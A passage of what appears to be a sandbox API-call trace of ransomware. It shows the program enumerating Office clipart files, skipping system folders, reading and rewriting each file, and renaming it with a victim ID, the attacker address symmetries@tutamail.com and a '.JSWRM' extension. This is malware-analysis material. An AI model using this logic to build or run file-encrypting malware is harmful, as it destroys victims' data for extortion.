(lpString1="J0297269.WMF", lpString2="...") returned 1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="windows") returned -1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="recovery") returned -1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="perflogs") returned -1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="documents and settings") returned 1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="system volume information") returned -1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="msocache") returned -1 [0089.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297269.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297269.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297269.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297269.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297269.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297269.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15652) returned 1 [0089.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d20) returned 0x24d210 [0089.136] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3d20, lpOverlapped=0x0) returned 1 [0089.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.138] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3d20, lpOverlapped=0x0) returned 1 [0089.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.139] CloseHandle (hObject=0x314) returned 1 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0089.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0089.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.140] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4236, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297725.WMF", cAlternateFileName="")) returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2=".") returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="..") returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="...") returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="windows") returned -1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="recovery") returned -1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="perflogs") returned -1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="documents and settings") returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="system volume information") returned -1 [0089.140] lstrcmpiW (lpString1="J0297725.WMF", lpString2="msocache") returned -1 [0089.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297725.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297725.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297725.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0089.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297725.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297725.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297725.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0089.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.141] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16950) returned 1 [0089.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4230) returned 0x24d210 [0089.141] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4230, lpOverlapped=0x0) returned 1 [0089.163] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.164] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4230, lpOverlapped=0x0) returned 1 [0089.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.164] CloseHandle (hObject=0x314) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0089.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0089.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0089.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0089.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.164] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0089.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.165] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf406dcf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c9c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297727.WMF", cAlternateFileName="")) returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2=".") returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="..") returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="...") returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="windows") returned -1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="recovery") returned -1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="perflogs") returned -1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="documents and settings") returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="system volume information") returned -1 [0089.165] lstrcmpiW (lpString1="J0297727.WMF", lpString2="msocache") returned -1 [0089.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297727.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297727.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297727.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297727.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297727.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297727.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.185] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15516) returned 1 [0089.185] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c90) returned 0x24d210 [0089.185] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c90, lpOverlapped=0x0) returned 1 [0089.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.187] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c90, lpOverlapped=0x0) returned 1 [0089.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.188] CloseHandle (hObject=0x314) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0089.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0089.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0089.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.190] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf406dcf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x493e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297757.WMF", cAlternateFileName="")) returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2=".") returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="..") returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="...") returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="windows") returned -1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="recovery") returned -1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="perflogs") returned -1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="documents and settings") returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="system volume information") returned -1 [0089.190] lstrcmpiW (lpString1="J0297757.WMF", lpString2="msocache") returned -1 [0089.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297757.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297757.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297757.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297757.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297757.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297757.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0089.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 